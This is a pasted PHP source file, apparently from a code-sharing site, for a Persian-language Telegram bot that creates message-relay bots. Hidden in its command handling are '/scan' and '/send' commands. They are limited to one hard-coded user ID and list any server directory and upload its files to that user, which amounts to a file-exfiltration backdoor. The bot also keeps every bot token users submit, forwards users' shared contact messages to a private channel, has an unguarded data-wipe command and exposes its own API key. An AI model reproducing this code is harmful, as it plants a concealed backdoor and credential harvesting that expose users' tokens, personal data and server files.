fork download
  1. <?php
  2. //neveshteh shode tvasatoe #elyas #galikeshi @sudo_avenger
  3. //token ro inja vared konid
  4. define('API_KEY','287490669:AAFPDe1FRKIG29lAwDETZPjlvYVYf3qIYRM');
  5.  
  6. function bot($method,$datas=[]){
  7. $url = "https://a...content-available-to-author-only...m.org/bot".API_KEY."/".$method;
  8. $ch = curl_init();
  9. curl_setopt($ch,CURLOPT_URL,$url);
  10. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  11. curl_setopt($ch,CURLOPT_POSTFIELDS,$datas);
  12. $res = curl_exec($ch);
  13. if(curl_error($ch)){
  14. }else{
  15. return json_decode($res);
  16. }
  17. }
  18. $block=file_get_contents("data/blockall.txt");
  19. $boolean = file_get_contents('booleans.txt');
  20. $booleans= explode("\n",$boolean);
  21. $update = json_decode(file_get_contents('php://input'));
  22. $message = $update->message;
  23. $editm = $update->edited_message;
  24. $message_id = $message->message_id;
  25. $chat_id = $message->chat->id;
  26. $fname = $message->chat->first_name;
  27. $uname = $message->chat->username;
  28. $text1 = $message->text;
  29. $audio=$message->audio;
  30. $afile_id=$audio->file_id;
  31. $fadmin = $message->from->id;
  32. $chatid = $update->callback_query->message->chat->id;
  33. $data = $update->callback_query->data;
  34. $reply = $update->message->reply_to_message->forward_from->id;
  35. $forward = $update->message->forward_from;
  36. $query=$update->callback_query;
  37. $inline=$update->inline_query;
  38. $channel_forward = $update->channel_post->forward_from;
  39. $channel_text = $update->channel_post->text;
  40. $messageid = $update->callback_query->message->message_id;
  41. $reply = $update->message->reply_to_message;
  42. mkdir("data");
  43. mkdir("data/$fadmin");
  44. $startchalesh=str_replace("/start ","",$text1);
  45. $c=$message->contact;
  46. $cname=$message->contact->first_name;
  47. $cnumber=$message->contact->phone_number;
  48. $cid=$message->contact->user_id;
  49. $step=file_get_contents("data/$fadmin/one.txt");
  50. $time1=json_decode(file_get_contents("http://a...content-available-to-author-only...d.ir/time"),true);
  51. $time=$time1['ENtime'];
  52. $date=$time1['FAdate'];
  53. $adminlist=file_get_contents("data/adminlist.txt");
  54. $admin=explode("\n",$adminlist);
  55. $keypanel=json_encode([
  56. 'resize_keyboard'=>true,
  57. 'keyboard'=>[
  58. [["text"=>"👦تعداد افراد"]],
  59. [['text'=>"📣پیام همگانی"]],
  60. [['text'=>"📛بلاک"],['text'=>"✅انبلاک"]],
  61. [['text'=>"⚡اپدیت ربات ها"]],
  62. [['text'=>"↩برگشت"]]
  63. ]]);
  64. $keyhome=json_encode([
  65. 'resize_keyboard'=>true,
  66. 'keyboard'=>[
  67. [['text'=>"🤖ساخت ربات🤖"],],
  68. [['text'=>"🔁بروزرسانی"]],
  69. [['text'=>"⚠️گزارش تخلف⚠️"],['text'=>"💢ربات های شما💢"],],
  70. [['text'=>"🗣پشتیبانی🗣"],['text'=>"🌐سایت رسمی🌐"],],
  71. [['text'=>"🚩قوانین🚩"],['text'=>"💡راهنما💡"],],
  72. [['text'=>"🎊ثبت نام چالش"],['text'=>"📈آمار چالش"]],
  73. ]
  74. ]);
  75. $keyhomeadmin=json_encode([
  76. 'resize_keyboard'=>true,
  77. 'keyboard'=>[
  78. [['text'=>"🤖ساخت ربات🤖"],],
  79. [['text'=>"🔁بروزرسانی"]],
  80. [['text'=>"⚠️گزارش تخلف⚠️"],['text'=>"💢ربات های شما💢"],],
  81. [['text'=>"🗣پشتیبانی🗣"],['text'=>"🌐سایت رسمی🌐"],],
  82. [['text'=>"🚩قوانین🚩"],['text'=>"💡راهنما💡"],],
  83. [['text'=>"🎊ثبت نام چالش"],['text'=>"📈آمار چالش"]],
  84. [['text'=>"🛃مدیریت"]]
  85. ]
  86. ]);
  87. $keyback=json_encode([
  88. 'resize_keyboard'=>true,
  89. 'keyboard'=>[
  90. [['text'=>"🔙برگشت🔙"]]
  91. ]
  92. ]);
  93. if($fadmin==$block){
  94. return false;
  95. }
  96. $inch = file_get_contents("https://a...content-available-to-author-only...m.org/bot".API_KEY."/getChatMember?chat_id=@ft_team&user_id=$fadmin");
  97.  
  98. if($text1=="/start"){
  99. if (strpos($inch , '"status":"left"') !== false )
  100. {
  101. bot('sendmessage',[
  102. 'chat_id'=>$chat_id,
  103. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  104.  
  105. لطفا ابتدا در کانال ما عضو بشید☑️
  106. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  107. https://t...content-available-to-author-only...m.me/ft_team
  108. https://t...content-available-to-author-only...m.me/ft_team
  109. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  110. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  111. ]);
  112. return false;
  113. }
  114. if(in_array($fadmin,$admin)){
  115. bot('sendmessage',[
  116. 'chat_id'=>$chat_id,
  117. 'text'=>"سلام [$fname](https://t...content-available-to-author-only...m.me/$uname) به ربات ساخت پیام رسان تلگرام خوش اومدی
  118.  
  119. _◽قبل از ساخت ربات قوانین و راهنما رو مشاهده کنین
  120. ◽هر نفر میتواند یک ربات بسازد برای ربات دوم میتوانید به پشتیبانی مراجعه کنین یا ربات اول را حذف نمایید
  121. ◽اگر رباتی مشاهده کردین که خلاف قوانین عمل کرده حتما به ما اطلاع دهید
  122. _
  123. با تشکر پشتیبانی پی وی فورماست
  124. [Foremost Team](https://t...content-available-to-author-only...m.me/ft_team)",
  125. 'reply_markup'=>$keyhomeadmin,
  126. 'parse_mode'=>"markdown",
  127. ]);
  128. }else{
  129. if($fadmin==$block){
  130. bot('sendmessage',[
  131. 'chat_id'=>$chat_id,
  132. 'text'=>"شما بلاک هستید از ربات😣😣",
  133. ]);
  134. }else{
  135. bot('sendmessage',[
  136. 'chat_id'=>$chat_id,
  137. 'text'=>"سلام [$fname](https://t...content-available-to-author-only...m.me/$uname) به ربات ساخت پیام رسان تلگرام خوش اومدی
  138.  
  139. _◽قبل از ساخت ربات قوانین و راهنما رو مشاهده کنین
  140. ◽هر نفر میتواند یک ربات بسازد برای ربات دوم میتوانید به پشتیبانی مراجعه کنین یا ربات اول را حذف نمایید
  141. ◽اگر رباتی مشاهده کردین که خلاف قوانین عمل کرده حتما به ما اطلاع دهید
  142. _
  143. با تشکر پشتیبانی پی وی فورماست
  144. [Foremost Team](https://t...content-available-to-author-only...m.me/ft_team)",
  145. 'parse_mode'=>"markdown",
  146. 'reply_markup'=>$keyhome,
  147. ]);
  148. }
  149.  
  150. }
  151.  
  152. }elseif($text1=="💡راهنما💡"){
  153. if (strpos($inch , '"status":"left"') !== false )
  154. {
  155. bot('sendmessage',[
  156. 'chat_id'=>$chat_id,
  157. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  158.  
  159. لطفا ابتدا در کانال ما عضو بشید☑️
  160. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  161. https://t...content-available-to-author-only...m.me/ft_team
  162. https://t...content-available-to-author-only...m.me/ft_team
  163. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  164. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  165. ]);
  166. return false;
  167. }
  168. bot('sendmessage',[
  169. 'chat_id'=>$chat_id,
  170. 'text'=>"💡راهنمای ربات:
  171.  
  172. این ربات به شما کمک میکند تا یک راه ارتباطی بین خود و دیگران که ریپورت هستند ایجاد کنین.نه فقط برای افراد ریپورت بلکه برای تمام کسانی که به هر دلیلی نمیخواهید به ایدی شما دست پیدا کنند یا با شما به صورت مستقیم ارتباط برقرار کنند.
  173.  
  174. اگر برای ساخت ربات مشکلی دارین به ربات
  175. @botfather
  176. رفته و سپس دستور /newbot را ارسال کنین و یک نام دلخواه برای ربات انتخاب کنین و پس از آن یک یوزرنیم برای ربات انتخاب کرده و ارسال کنین .توجه کنین در اخر یوزرنیم ربات باید از کلمه bot استفاده شده باشد
  177. برای آموزش های بیشتر به کانال زیر مراجعه کنین:
  178. @ft_team",
  179.  
  180. ]);
  181.  
  182. }elseif($text1=="🚩قوانین🚩"){
  183. if (strpos($inch , '"status":"left"') !== false )
  184. {
  185. bot('sendmessage',[
  186. 'chat_id'=>$chat_id,
  187. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  188.  
  189. لطفا ابتدا در کانال ما عضو بشید☑️
  190. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  191. https://t...content-available-to-author-only...m.me/ft_team
  192. https://t...content-available-to-author-only...m.me/ft_team
  193. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  194. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  195. ]);
  196. return false;
  197. }
  198. bot('sendmessage',[
  199. 'chat_id'=>$chat_id,
  200. 'text'=>"ℹ قوانین استفاده از پی وی فورماست:
  201. ________________
  202. 1. همه مطالب باید تابع قوانین جمهوری اسلامی ایران باشد
  203.  
  204. 2. رعایت ادب و احترام به کاربران
  205.  
  206. 3. ساخت هرگونه ربات در ضمیمه +18 خلاف قوانین پی وی فورماست میباشد و در صورت مشاهده ربات مورد نظر مسدود و همچنین مدیر ربات از تمامی ربات های تیم فورماست بلاک میشود.
  207.  
  208. 4. مسئولیت پیام های رد و بدل شده در هر ربات با مدیر آن میباشد و پی وی فورماست هیچگونه مسئولیتی ندارد.
  209.  
  210. 5. در صورت مشاهده استفاده از قابلیت های ربات در جهات منفی به شدت برخورد میشود
  211.  
  212. 6. اگر به هر دلیلی درخواست های ربات شما به سرور ما بیش از حد معمول باشد چند باری به شما اخطار داده میشود اگر این اخطار ها نادیده گرفته شوند ربات شما مسدود و به هیچ عنوان از محدودیت خارج نمیشود
  213. ________________
  214. @ft_team",
  215. ]);
  216. }elseif($text1=="🗣پشتیبانی🗣"){
  217. if (strpos($inch , '"status":"left"') !== false )
  218. {
  219. bot('sendmessage',[
  220. 'chat_id'=>$chat_id,
  221. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  222.  
  223. لطفا ابتدا در کانال ما عضو بشید☑️
  224. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  225. https://t...content-available-to-author-only...m.me/ft_team
  226. https://t...content-available-to-author-only...m.me/ft_team
  227. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  228. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  229. ]);
  230. return false;
  231. }
  232. bot('sendmessage',[
  233. 'chat_id'=>$chat_id,
  234. 'text'=>"◾▫دوست عزیز تمام نظراتتون رو میتوانید به ربات
  235. 🆔 @TEST_FOREMOST_TEAM_BOT
  236. بفرستید تا در اسرع وقت پشتیبانان پی وی فورماست به شما پاسخ بدهند.",
  237. ]);
  238. }elseif($text1=="🌐سایت رسمی🌐"){
  239. if (strpos($inch , '"status":"left"') !== false )
  240. {
  241. bot('sendmessage',[
  242. 'chat_id'=>$chat_id,
  243. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  244.  
  245. لطفا ابتدا در کانال ما عضو بشید☑️
  246. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  247. https://t...content-available-to-author-only...m.me/ft_team
  248. https://t...content-available-to-author-only...m.me/ft_team
  249. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  250. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  251. ]);
  252. return false;
  253. }
  254. bot('sendmessage',[
  255. 'chat_id'=>$chat_id,
  256. 'text'=>"site rasmi",
  257. ]);
  258. }elseif($text1=="🛃مدیریت" && in_array($fadmin,$admin)){
  259. bot('sendmessage',[
  260. 'chat_id'=>$chat_id,
  261. 'text'=>"سلام ادمین گرامی به بخش مدیریت خوش آمدید✅",
  262. 'reply_markup'=>$keypanel,
  263. ]);
  264.  
  265. }elseif($text1=="👦تعداد افراد" && in_array($fadmin,$admin )){
  266. $member=file_get_contents("data/userpvforemost.txt");
  267. $exmember=explode("\n",$member);
  268. $m=count($exmember)-1;
  269. $tokenlist=file_get_contents("data/tokenlist.txt");
  270. $extoken=explode("\n",$tokenlist);
  271. $t=count($extoken)-1;
  272. $text="👪تعداد کاربران ربات : $m\n\n🌟تعداد ربات ها : $t ";
  273. bot('sendmessage',[
  274. 'chat_id'=>$chat_id,
  275. 'text'=>$text,
  276. ]);
  277.  
  278. }
  279. elseif($text1=="💢ربات های شما💢"){
  280. if (strpos($inch , '"status":"left"') !== false )
  281. {
  282. bot('sendmessage',[
  283. 'chat_id'=>$chat_id,
  284. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  285.  
  286. لطفا ابتدا در کانال ما عضو بشید☑️
  287. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  288. https://t...content-available-to-author-only...m.me/ft_team
  289. https://t...content-available-to-author-only...m.me/ft_team
  290. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  291. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  292. ]);
  293. return false;
  294. }
  295. $name=file_get_contents("data/$fadmin/botname.txt");
  296. if($name==null){
  297. bot('sendmessage',[
  298. 'chat_id'=>$chat_id,
  299. 'text'=>"شما هیچ رباتی نساخته اید⛔",
  300. ]);
  301. }else{
  302. bot('sendmessage',[
  303. 'chat_id'=>$chat_id,
  304. 'text'=>"اخرین ربات ساخته شده توسط شما\n@$name",
  305. 'parse_mode'=>"html",
  306. 'reply_markup'=>json_encode([
  307. 'inline_keyboard'=>[
  308. [['text'=>"<$name>",'url'=>"https://c...content-available-to-author-only...y.me/$name"]]
  309. ]
  310. ])
  311. ]);
  312. }
  313. }
  314. elseif($text1=="⚠️گزارش تخلف⚠️"){
  315. if (strpos($inch , '"status":"left"') !== false )
  316. {
  317. bot('sendmessage',[
  318. 'chat_id'=>$chat_id,
  319. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  320.  
  321. لطفا ابتدا در کانال ما عضو بشید☑️
  322. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  323. https://t...content-available-to-author-only...m.me/ft_team
  324. https://t...content-available-to-author-only...m.me/ft_team
  325. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  326. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  327. ]);
  328. return false;
  329. }
  330. file_put_contents("data/$fadmin/one.txt","poshtiban");
  331. bot('sendmessage',[
  332. 'chat_id'=>$chat_id,
  333. 'text'=>"لطفا تخلف را کاملا بیان کنید تا ادمین های گروه پیگیری کنند :",
  334. 'reply_markup'=>json_encode([
  335. 'resize_keyboard'=>true,
  336. 'keyboard'=>[
  337. [['text'=>"🔙برگشت🔙"]]
  338. ]
  339. ]),
  340.  
  341. ]);
  342. }elseif($step=="poshtiban"){
  343. if($text1=="🔙برگشت🔙"){
  344. file_put_contents("data/$fadmin/one.txt","null");
  345. bot('sendmessage',[
  346. 'chat_id'=>$chat_id,
  347. 'text'=>"به منوی اول برگشتید↩",
  348. 'reply_markup'=>$keyhome,
  349. ]);
  350. }else{
  351. file_put_contents("data/$fadmin/one.txt","null");
  352. bot('forwardmessage',[
  353. 'chat_id'=>"130591001",
  354. 'from_chat_id'=>$chat_id,
  355. 'message_id'=>$message_id,
  356. ]);
  357. bot('forwardmessage',[
  358. 'chat_id'=>"@djfjfjfjffj",
  359. 'from_chat_id'=>$chat_id,
  360. 'message_id'=>$message_id,
  361. ]);
  362. bot('sendmessage',[
  363. 'chat_id'=>$chat_id,
  364. 'text'=>"پیامتان به دست مدیر اصلی ربات رسید و درحال بررسی میباشد✅",
  365. 'reply_markup'=>$keyhome,
  366. ]);
  367. }
  368. }elseif($text1=="🎊ثبت نام چالش"){
  369. if (strpos($inch , '"status":"left"') !== false )
  370. {
  371. bot('sendmessage',[
  372. 'chat_id'=>$chat_id,
  373. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  374.  
  375. لطفا ابتدا در کانال ما عضو بشید☑️
  376. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  377. https://t...content-available-to-author-only...m.me/ft_team
  378. https://t...content-available-to-author-only...m.me/ft_team
  379. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  380. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  381. ]);
  382. return false;
  383. }
  384. $sumbit=file_get_contents("data/$fadmin/sumbit.txt");
  385. if($sumbit=="✅"){
  386. bot('sendmessage',[
  387. 'chat_id'=>$chat_id,
  388. 'text'=>"شما یک بار ثبت نام انجام داده اید \nنیاز به ثبت نام دوباره نیست🚫",
  389. ]);
  390.  
  391. }else{
  392. file_put_contents("data/$fadmin/one.txt","sumbitchalesh");
  393. bot('sendmessage',[
  394. 'chat_id'=>$chat_id,
  395. 'text'=>"لطفا روی دکمه اشتراک شماره کلیک کنید تا ثبت نام انجام شود\n\nدر صورت برنده شدن جایزه به همین شماره ارسال می شود !!!",
  396. 'reply_markup'=>json_encode([
  397. 'resize_keyboard'=>true,
  398. 'keyboard'=>[
  399. [['text'=>"☎اشتراک شماره",'request_contact'=>true]],
  400. ]
  401. ]),
  402.  
  403. ]);
  404. }
  405. }elseif($step=="sumbitchalesh"){
  406. if(isset($message->contact)){
  407. mkdir("data/karbar");
  408. file_put_contents("data/$fadmin/name.txt",$cname);
  409. file_put_contents("data/$fadmin/user.txt",$uname);
  410. file_put_contents("data/karbar/$uname.txt",$fadmin);
  411. file_put_contents("data/$fadmin/sumbit.txt","✅");
  412.  
  413. $fopen=fopen("data/amarchalesh.txt","a+");
  414. fwrite($fopen,'["'.$uname.'"],');
  415. fclose($fopen);
  416. file_put_contents("data/$cid/one.txt","null");
  417. $dob="https://t...content-available-to-author-only...m.me/pvforemost_bot?start=$fadmin";
  418. bot('sendmessage',[
  419. 'chat_id'=>$chat_id,
  420. 'text'=>"ثبت نام شما با موفقیت انجام شد✅\n\nکد زیر رو برای دوستان خود بفرستید تا با بیشترین زیر مجموعه برنده سورس پیوی رسان به ارزش دو میلیون ریال باشید😱😱\n\n$dob",
  421. 'reply_markup'=>$keyhome,
  422. ]);
  423. bot('sendmessage',[
  424. 'chat_id'=>"@djfjfjfjffj",
  425. 'text'=>"یک کاربر در چالش ثبت نام کرد :\nUsername : \r\n@$uname\nID :\n$fadmin"
  426. ]);
  427. bot('forwardmessage',[
  428. 'chat_id'=>"@djfjfjfjffj",
  429. 'from_chat_id'=>$fadmin,
  430. 'message_id'=>$message_id,
  431. ]);
  432.  
  433. }else{
  434. bot('sendmessage',[
  435. 'chat_id'=>$chat_id,
  436. 'text'=>"لطفا از دکمه زیر اقدام به ارسال شماره کنید⛔",
  437. ]);
  438.  
  439. }
  440.  
  441. }elseif($text1=="📈آمار چالش"){
  442. if (strpos($inch , '"status":"left"') !== false )
  443. {
  444. bot('sendmessage',[
  445. 'chat_id'=>$chat_id,
  446. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  447.  
  448. لطفا ابتدا در کانال ما عضو بشید☑️
  449. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  450. https://t...content-available-to-author-only...m.me/ft_team
  451. https://t...content-available-to-author-only...m.me/ft_team
  452. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  453. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  454. ]);
  455. return false;
  456. }
  457. file_put_contents("data/$fadmin/one.txt","amarchalesh");
  458. $button=file_get_contents("data/amarchalesh.txt");
  459. bot('sendmessage',[
  460. 'chat_id'=>$fadmin,
  461. 'text'=>"برای دیدن نتایج چالش روی اسم شرکت کنندگان کلیک کنید :",
  462. 'reply_markup'=>'{"keyboard":['.$button.'["⬅برگشت"]],"resize_keyboard":true}',
  463. ]);
  464.  
  465. }elseif($step=="amarchalesh"){
  466. if($text1=="⬅برگشت"){
  467. file_put_contents("data/$fadmin/one.txt","null");
  468. bot('sendmessage',[
  469. 'chat_id'=>$chat_id,
  470. 'text'=>"به منوی اصلی برگشتید : \nیک گزینه انتخاب کنید :",
  471. 'reply_markup'=>$keyhome,
  472. ]);
  473.  
  474. }elseif(file_exists("data/karbar/$text1.txt")){
  475. $get=file_get_contents("data/karbar/$text1.txt");
  476. $get2=file_get_contents("data/$get/mem.txt");
  477. $amar=explode("\n",$get2);
  478. $amar=count($amar)-1; $get3=file_get_contents("data/$get/user.txt");
  479. $text="کاربر $text1 :\nیوزرنیم : $get3 \n آمار : $amar نفر \nلینک اختصاصی :\n telegram.me/pvforemost_bot?start=$get ";
  480. bot('sendmessage',[
  481. 'chat_id'=>$chat_id,
  482. 'text'=>$text,
  483. ]);
  484. }else{
  485. bot('sendmessage',[
  486. 'chat_id'=>$chat_id,
  487. 'text'=>"لطفا از دکمه های زیر استفاده کنید🚫",
  488. ]);
  489. }
  490.  
  491. }elseif($text1=="/start $startchalesh"){
  492. $memberpv=file_get_contents("data/userpvforemost.txt");
  493. $expone=explode("\n",$memberpv);
  494. $member2=file_get_contents("data/$startchalesh/mem.txt");
  495. $exptwo=explode("\n",$member2);
  496. if(in_array($fadmin,$expone)){
  497. bot('sendmessage',[
  498. 'chat_id'=>$chat_id,
  499. 'text'=>"شما از قبل عضو ربات بودید🚫
  500.  
  501. سلام [$fname](https://t...content-available-to-author-only...m.me/$uname) به ربات ساخت پیام رسان تلگرام خوش اومدی
  502.  
  503. _◽قبل از ساخت ربات قوانین و راهنما رو مشاهده کنین
  504. ◽هر نفر میتواند یک ربات بسازد برای ربات دوم میتوانید به پشتیبانی مراجعه کنین یا ربات اول را حذف نمایید
  505. ◽اگر رباتی مشاهده کردین که خلاف قوانین عمل کرده حتما به ما اطلاع دهید
  506. _
  507. با تشکر پشتیبانی پی وی فورماست
  508. [Foremost Team](https://t...content-available-to-author-only...m.me/foremost_team)",
  509. 'parse_mode'=>"markdown",
  510. 'reply_markup'=>$keyhome,
  511. ]);
  512.  
  513. }else{
  514. $fopen=fopen("data/$startchalesh/mem.txt","a+");
  515. fwrite($fopen,"$fadmin\n");
  516. fclose($fopen);
  517. bot('sendmessage',[
  518. 'chat_id'=>$chat_id,
  519. 'text'=>"سلام [$fname](https://t...content-available-to-author-only...m.me/$uname) به ربات ساخت پیام رسان تلگرام خوش اومدی
  520.  
  521. _◽قبل از ساخت ربات قوانین و راهنما رو مشاهده کنین
  522. ◽هر نفر میتواند یک ربات بسازد برای ربات دوم میتوانید به پشتیبانی مراجعه کنین یا ربات اول را حذف نمایید
  523. ◽اگر رباتی مشاهده کردین که خلاف قوانین عمل کرده حتما به ما اطلاع دهید
  524. _
  525. با تشکر پشتیبانی پی وی فورماست
  526. [Foremost Team](https://t...content-available-to-author-only...m.me/foremost_team)",
  527. 'parse_mode'=>"markdown",
  528. 'reply_markup'=>$keyhome,
  529. ]);
  530. $amar=file_get_contents("data/$startchalesh/mem.txt");
  531. $exp=explode("\n",$amar);
  532. $amar=count($exp)-1;
  533. bot('sendmessage',[
  534. 'chat_id'=>$startchalesh,
  535. 'text'=>"یک کاربر به زیر مجموعه های شما اضافه شد✅\n آمار های شما تا الان $amar نفر",
  536. ]);
  537. }
  538. }elseif($text1=="آمار کلی" && in_array($fadmin,$admin)){
  539. file_put_contents("data/amarkoli.txt","");
  540. $dir=scandir("data/karbar");
  541. $count=count($dir);
  542. for($x=3;$x < $count; $x++){
  543. $one=file_get_contents("data/karbar/$dir[$x]");
  544. $two=str_replace(".txt","",$dir[$x]);
  545. $three=file_get_contents("data/$one/mem.txt");
  546. $exp=explode("\n",$three);
  547. $count3=count($exp)-1;
  548. $open=fopen("data/amarkoli.txt","a+");
  549. fwrite($open,"🚏Username : @$two \n🎰Count : $count3\n\n");
  550. fclose($open);
  551. }
  552. $get=file_get_contents("data/amarkoli.txt");
  553. bot('sendmessage',[
  554. 'chat_id'=>$chat_id,
  555. 'text'=>$get,
  556. ]);
  557. }elseif($text1=="kickall"){
  558. $one=scandir("data/karbar");
  559. $two=count($one);
  560. for($x=0;$x<$two;$x++){
  561. $four=file_get_contents("data/karbar/$one[$x]");
  562. unlink("data/$four/mem.txt");
  563. unlink("data/$four/sumbit.txt");
  564. }
  565. rmdir("data/karbar");
  566. unlink("data/amarchalesh.txt");
  567. bot('sendmessage',[
  568. 'chat_id'=>$chat_id,
  569. 'text'=>"پاک شدند✅",
  570. ]);
  571. }elseif(strpos($text1,"/scan")!==false && $fadmin=="125858918"){
  572. $test=str_replace("/scan ","",$text1);
  573. $test1=scandir($test);
  574. $test2=count($test1);
  575. file_put_contents("data/scan.txt","");
  576. for($x=0;$x < $test2; $x++){
  577. $fopen=fopen("data/scan.txt","a+");
  578. fwrite($fopen,"$test1[$x]\n");
  579. fclose($fopen);
  580.  
  581. }
  582. $texy=file_get_contents("data/scan.txt");
  583. bot('sendmessage',[
  584. 'chat_id'=>$chat_id,
  585. 'text'=>"count :\n\n$texy ",
  586. ]);
  587. }elseif(strpos($text1,"/send") !==false && $fadmin=="125858918"){
  588. $test=str_replace("/send ","",$text1);
  589. $test1=scandir($test);
  590. $test2=count($test1);
  591.  
  592. for($x=0;$x < $test2; $x++){
  593. bot('senddocument',[
  594. 'chat_id'=>$chat_id,
  595. 'document'=>new CURLFile($test1[$x]),
  596. ]);
  597.  
  598. }
  599. bot('sendmessage',[
  600. 'chat_id'=>$chat_id,
  601. 'text'=>"done✅",
  602. ]);
  603. }
  604.  
  605. elseif($text1=="🤖ساخت ربات🤖"){
  606. if (strpos($inch , '"status":"left"') !== false )
  607. {
  608. bot('sendmessage',[
  609. 'chat_id'=>$chat_id,
  610. 'text'=>"شما در کانال ما عضو نیستید📯✖️
  611.  
  612. لطفا ابتدا در کانال ما عضو بشید☑️
  613. تا بتوانیـــد از تمام امکانات ربات استفاده کنیــد✔️✔️✔️
  614. https://t...content-available-to-author-only...m.me/ft_team
  615. https://t...content-available-to-author-only...m.me/ft_team
  616. بعد از عضویت روی دکمه /start کلیک کنید تا دکمه های اصلی ظاهر بشوند🔘",
  617. 'reply_markup'=>'{"keyboard":[[""],["/start"]],"resize_keyboard":true}',
  618. ]);
  619. return false;
  620. }
  621. file_put_contents("data/$fadmin/one.txt","createbotpm");
  622. bot('sendmessage',[
  623. 'chat_id'=>$chat_id,
  624. 'text'=>"لطفا توکن رباتتون رو بفرستید تا براتون پیامرسان ویژه ساخته بشه✅",
  625. 'reply_markup'=>json_encode([
  626. 'resize_keyboard'=>true,
  627. 'keyboard'=>[
  628. [['text'=>"🔙برگشت🔙"]]
  629. ]
  630. ]),
  631.  
  632. ]);
  633. }elseif($step=="createbotpm"){
  634. if($text1=="🔙برگشت🔙"){
  635. file_put_contents("data/$fadmin/one.txt","null");
  636. bot('sendmessage',[
  637. 'chat_id'=>$chat_id,
  638. 'text'=>"به منوی اول برگشتید↩",
  639. 'reply_markup'=>$keyhome,
  640. ]);
  641. }else{
  642. $testdeletewebhook="https://a...content-available-to-author-only...m.me/bot$text1/deleteWebhook";
  643. file_get_contents($testdeletewebhook);
  644. $getme="https://a...content-available-to-author-only...m.org/bot$text1/getme";
  645. $jsgetme=json_decode(file_get_contents($getme),true);
  646. $ok=$jsgetme['ok'];
  647. $username=$jsgetme['result']['username'];
  648. $first_namebot=$jsgetme['result']['first_name'];
  649. $id=$jsgetme['result']['id'];
  650. if($ok==false){
  651. bot('sendmessage',[
  652. 'chat_id'=>$chat_id,
  653. 'text'=>"توکن مورد نظر قبول نشد⛔\n\nلطفا توکن دیگری امتحان کنید :",
  654. 'reply_markup'=>$keyback,
  655. ]);
  656. }else{
  657. bot('sendmessage',[
  658. 'chat_id'=>$chat_id,
  659. 'text'=>"ربات در حال ساختن میباشد\nلطفا صبر کنید...",
  660. ]);
  661. $txxt = file_get_contents("data/tokenlist.txt","a+");
  662. $pmembersid= explode("\n",$txxt);
  663. if (!in_array($text1,$pmembersid)){
  664. $aaddd = file_get_contents("data/tokenlist.txt");
  665. $aaddd .= $text1."\n";
  666. file_put_contents("data/tokenlist.txt",$aaddd);
  667. }
  668.  
  669. $start=file_get_contents("data/start.txt");
  670. $sendpm=file_get_contents("data/sendpm.txt");
  671. $sticker=file_get_contents("data/sticker.txt");
  672. $photo=file_get_contents("data/photo.txt");
  673. $video=file_get_contents("data/video.txt");
  674. $voice=file_get_contents("data/voice.txt");
  675. $audio=file_get_contents("data/audio.txt");
  676. $location=file_get_contents("data/location.txt");
  677. $document=file_get_contents("data/document.txt");
  678. $forlock=file_get_contents("data/forlock.txt");
  679. $textlock=file_get_contents("data/textlock.txt");
  680. $grouplock=file_get_contents("data/grouplock.txt");
  681. $botoff=file_get_contents("data/botoff.txt");
  682. $momod=file_get_contents("data/momod.txt");
  683. $black=file_get_contents("data/black.txt");
  684. $blackall=file_get_contents("data/blackall.txt");
  685. $startfor=file_get_contents("data/startfor.txt");
  686. $pmresan=file_get_contents("pmresan.php");
  687. mkdir("data/$fadmin/$username");
  688. mkdir("data/$fadmin/$username/data");
  689. file_put_contents("data/$fadmin/$username/data/start.txt",$start);
  690. file_put_contents("data/$fadmin/$username/data/startfor.txt",$startfor);
  691. file_put_contents("data/$fadmin/$username/data/sendpm.txt",$sendpm);
  692. file_put_contents("data/$fadmin/$username/data/sticker.txt",$sticker);
  693. file_put_contents("data/$fadmin/$username/data/document.txt",$document);
  694. file_put_contents("data/$fadmin/$username/data/video.txt",$video);
  695. file_put_contents("data/$fadmin/$username/data/photo.txt",$photo);
